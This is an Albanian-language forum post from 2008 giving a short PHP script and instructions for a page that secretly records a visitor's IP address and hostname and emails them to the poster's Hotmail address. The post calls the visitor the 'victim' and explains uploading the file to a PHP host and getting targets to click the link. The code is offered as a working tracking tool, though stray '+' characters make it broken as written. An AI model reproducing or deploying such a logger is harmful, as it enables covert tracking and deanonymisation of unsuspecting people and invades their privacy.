Krijimi i nje indexi qe ta vjedh Ip-ne

Shko poshtė

Krijimi i nje indexi qe ta vjedh Ip-ne

Mesazh  gb-2x prej Sun Oct 12, 2008 8:03 pm

Hapim Notepad
Per me ndryshu E-Mail-in me ndu tondin e ndrroni ketu $email = "";

[code]<? +
$ip = $REMOTE_ADDR; +
$host = gethostbyaddr($ip); +
$date = date("d/m/Y H:i:s"); +
$email = "[url=http://studentet-ks.albanianforum.net/mailto:baba.big-x@hotmail.com]baba.big-x@hotmail.com[/url]"; +
$sujet = "Ip + Host"; +
$message = "<html><body>Moment : $date<br>Ip : $ip<br>Host : $host</body></html>"; +
if(mail($email,$sujet,$message,"Content-Type: text/html")){ +
echo "Ownneeed";} +
else { echo "Shit ?";} +
?> + [/code]

Dhe e ruajm ne Pc tonde me emrin sg1.php
Edhe e uploadoim dikund me nje host qe pranon .php files
pastaj kur clickojm [url=http://www.hosti.com/index.php]http://www.hosti.com/index.php[/url]
IP E victimes te vjen nė e-mail

gb-2x
Fillestar/e
Fillestar/e

Numri i postimeve : 11
Nofka juaj : xh!b1
Reputation : 0
Pikėt : 3510
Registration date : 12/10/2008

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Mbrapsht nė krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi